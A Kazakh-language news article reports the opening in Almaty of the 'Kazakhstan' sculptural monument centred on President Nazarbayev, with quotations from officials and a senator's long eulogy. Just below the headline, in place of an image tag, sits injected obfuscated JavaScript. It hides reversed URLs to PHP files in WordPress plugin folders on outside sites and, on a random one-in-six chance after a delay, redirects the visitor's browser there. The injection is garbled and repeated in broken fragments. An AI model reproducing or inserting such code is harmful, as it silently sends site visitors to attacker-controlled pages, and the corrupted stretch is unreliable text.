Алматыда Елбасына ескерткіш қойылды

Алматыда Елбасына ескерткіш қойылды

1-bet-pamya-tnik$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tories/1-bet-pamya-tnik.jpg» height=»149″ width=»227″ />

Алматыдағы Қазақстан Республикасының Тұңғыш Президенті Нұрсұлтан Назарбаев атындағы саябақта «Қазақстан» монументтік-мүсіндік композициялық ескерткішінің ашылу салтанаты болды. Салтанатқа еліміздің көрнекті мемлекет және қоғам қайраткерлері, ғалымдар мен ақын-жазушылар, өнер иелері және қала тұрғындары қатысты.


Мәселенің мәнісіне келсек, үстіміздегі жылдың 25-қазанында еліміздің бір топ зиялы қауым өкілдері (хат авторлары — Қазақстан шаһар құрылысшылары одағының президенті Любовь Нысанбаева, Сәулетшілер одағының президенті Ақмарал Рүстембекова, Қазақстан дизайнерлер одағының президенті Тимур Сүлейменов және Суретшілер одағының президенті Байтұрсын Өмірбеков) Елбасының атына арнайы хат жолдап, ел Тәуелсіздігінің 20 жылдығына орай Алматыда «Қазақстан» монументтік-мүсіндік композициясын жасау ниеті бар екендігін жеткізіпті. Болашақ ұрпақ үшін тағылымы мол осынау монументтік-мүсіндік композицияны салу үшін бюджеттен бір тиын қаржы жұмсалмаған. Қажетті қаржының барлығын монументке қатысқан мүсіншілер мен хат авторларының өздері көтерген. Сондықтан жұмсалған қаржының көлемі де құпия! Ең бастысы, «Қазақстан» монументтік-мүсіндік композициясы Тәуелсіз Қазақ елінің кешегісі мен бүгінгісін паш ететін, айтар ойы мен мән-мағынасы терең, бірегей ескерткіш кешені! Алматы қаласының әкімі Ахметжан Есімов тәуелсіз қазақ елінің, Алматы қаласының соңғы 20 жыл ішінде қол жеткен толайым табыстарына тоқтала келіп, осынау игілікті істе Елбасы Назарбаевтың атқарған ісі айрықша екендігін тілге тиек етті. Одан соң сөз алған мемлекет және қоғам қайраткері, ҚазКСР Министрлер Кеңесі төрағасының бұрынғы орынбасары Сұлтан Жиенбаев, Социалистік Еңбек Ері, КазКСР Министрлер Кеңесі төрағасының бұрынғы орынбасары Вера Сидорова, сенатор Қуаныш Сұлтанов, Қазақстанның халық артисі Асанәлі Әшімов, Жазушылар Одағының төрағасы Нұрлан Оразалин, Алматыдағы №102 орта мектептің қазақ тілінің мұғалімі Татьяна Бажиевалар Қазақстанның дүниежүзіне танылуында Назарбаевтың рөлі мен атқарған ісінің ұшан-теңіз екендігін жеткізді. Алматы қаласының әкімі Ахметжан Есімов пен қоғам қайраткері Сұлтан Жиенбаев салтанатты жағдайда «Қазақстан» мүсіндік-монументтік ескерткішін ашты. Ескерткіш композиция қола мен граниттен және мрамордан жасалған. Алыстан қарағанда ескерткіш қанатын кең жайып ұшып келе жатқан қыран бүркітке ұқсайды. Бұл жөнінде ескерткіштің авторы, мүсінші Шоқан Төлеш: — Бұл ескерткіш арқылы біз тәуелсіз Қазақстанның жетістігін бейнелеуге тырыстық. Ескерткіштің артындағы графиканы менің қызым, Ботагөз сызды. Бүркіттің қос қанаты Алматы мен Астана қалалары. Астананы бейнелейтін қанатында елордамыздағы Бәйтерек, Ханшатыры секілді бірқатар сәулетті ғимараттар көрініс тапқан. Ал Алматыны бейнелейтін қанатынан оңтүстік астанамыздағы сәулетті ғимараттарды байқауға болады. Өздеріңіз білесіздер, дүниенің төрт бұрышына Қазақ елінің танылуына Қазақстанның Президенті Нұрсұлтан Назарбаев өте көп еңбек сіңірді. Сондықтан да біз осы композициялық ескерткіштің ортасына Елбасы Нұрсұлтан Әбішұлы Назарбаевтың кемел шағын бейнелейтін мүсінді салған жөн деп таптық. Өйткені сөз жоқ, тәуелсіз Қазақстан дегенде Елбасы Нұрсұлтан Назарбаев, ал Нұрсұлтан Назарбаев дегенде тәуелсіз Қазақ елі аузымызға оралады. Міне, біз бұл композицияда осы тұжырымды басшылыққа алдық, — дейді.
Қуаныш СҰЛТАНОВ, сенатор, ҚР Парламенті Сенатының Халықаралық қатынастар, қорғаныс және қауіпсіздік комитетінің төрағасы: — Алматы — ең қасиетті құндылығымыз — тәуелсіздігімізді жариялап, ұлттың азаттық Туын көтерген тәуелсіздігіміздің алтын бесігі! Алматы — ұлттық рух, халықтық бірлігімізді тұтастырып, еңсемізді көтеріп, өркениет жорығын бастаған тәуелсіз мемлекеттің Тұңғыш Президентін сайлаған асыл Орда. Осы Алматыда біздің Президенттің бастамашылдығымен Тәуелсіз Мемлекеттер Достастығы, Азиядағы Сенім шаралары кеңесі, тағы басқа да халықаралық ұйымдар құрылды. Тұңғыш Президент туған елінің дүниежүзілік қоғамдастықта еңсесі биік ел болып танылуына күш салып, әлемнің назарын қазаққа аударып, ісін көрсетіп, сөзін тыңдатып, ақылын мойындатып, жаңа дәуір тұсында халқымыздың тұрмыс-әлеуетінің өсіп, өркендеуі үшін ең маңызды шешімдер қабылдап, оны жүзеге асырып, көркейгенін көрген жер. Қазақстанның 2030 жылға дейінгі даму стратегиясын Нұрсұлтан Әбішұлы осы Алматыда әзірлеп, жариялап, оны бүкіл қазақстандықтардың игілігіне, гүлденуіне жалғастырып, жасампаздыққа бастап, елді өз мүмкіндігіне, өз күшіне өзін сендіре алған іскер Орталық. Алматы — Нұрсұлтан Назарбаевтың «ғасыр жобасы» деген мәртебеге ие болған Қазақстанның Орталық өңірінің төсіне тәуелсіз мемлекетіміздің жаңа астанасын салу идеясын толғатып, жарыққа шығарып, халыққа жаратқан жасампаз қала. Мемлекет болу талпынысын жүзеге асыратын халық, сол халықты мемлекет мүддесіне ұйымдастырып, жұмылдыра алатын асқан қайраткерлік қабілеті бар жетекші Тұлға екендігіне осы жиырма жылда көзіміз айқын жетті. Қазақ халқы ежелден «сөз бастайтын шешенге, қол бастайтын көсемге» жол берген, сенім көрсеткен. Сындарлы кезеңде тарихтың шетінде қалып қоймай, өркениетті өсер елдің тіршілігін жасау үшін халқымыз ел тізгінін арманда кеткен талай ұрпақ, бабалардың мұрагері, ұлт перзенті — Нұрсұлтан Әбішұлы Назарбаевқа тапсырды, жорығын қолдап, соңынан ерді. Тұңғыш Президент те халқына берген Антын қалтқысыз орындап, аянбай тер төгумен келеді. Мемлекеттік тәуелсіздігімізді жария еткен алғашқы сәттен бастап, дербес мемлекетіміздің қуаттануы мен абаттануы сөз жоқ Тұңғыш Президентіміз, Елбасының есімімен, еңбегімен, басшылығымен тікелей байланысты. Президенттің қазақ халқы алдындағы, мемлекет алдындағы атқарған қызметі орасан, еңбегі ерен! Нұрсұлтан Әбішұлы Назарбаев жаңа дәуірдегі жаңа Қазақстан мемлекетінің негізін қалыптастырып, іргетасын қалап, қабырғасын тұрғызып, шаңырағын көтеріп, шекарасын бекітті. Қазақты әлемге танытты, мойындатты. Елімізде көпұлттың, көп діннің басын біріктіріп, татулық орнатып, қоғамдық келісімге келтіріп, тәуелсіз мемлекет мүддесіне жұмылдыра білді. Салиқалы сыртқы саясаты, салмақты бастамашыл қағидаттары арқылы дүниежүзілік қоғамдастықта Қазақстанның беделін мейлінше биікке көтерді. Әлемнің ең беделді жоғары дәрежедегі кездесу, жиындарында біздің Елбасының сөзі тың ойымен, орынды ұсыныстарымен ерекшеленеді. Осыдан 20 жыл бұрын Қазақстанның қайда екенін, қазақтың кім екенін білмейтін елдердің басшылары Елбасымен санасып, сөзіне құлақ асатын, құрметпен сыйлайтын болды. «Еріне қарап, елін таниды» деген халық нақылы осындайда айтылса керек. Түркия президенті Абдолла Гюль Қазақстан Президентін бүкіл Түрік әлемінің көшбасшысы деп бағалап, Анкара қаласының мэриясының шешімімен Түркия Астанасында өткен жылы қазақ Президентіне көрікті ескерткіш орнатып, салтанатты мереке өткізді. Біздің Елбасына мұндай құрмет басқа елдерде де көрсетілуде. Бүгін Алматы қаласында ашылатын монументтік-мүсіндік композицияны — тәуелсіз мемлекетіміздің символы, Нұрсұлтан Әбішұлының мемлекет, ұлт алдындағы қыруар еңбегіне, мемлекеттік қайраткерлігіне берілген әділ баға, тарихи таным деп қабылдағанымыз орынды! Сондай-ақ бұл кешен біздің сәулетшілеріміз бен мүсіншілеріміздің шебер шығармашылық туындысы.
www.Kyzmet-gazeti.kz{jcomments on}

Leave a Reply

Ваш адрес email не будет опубликован. Обязательные поля помечены *

Яндекс.Метрика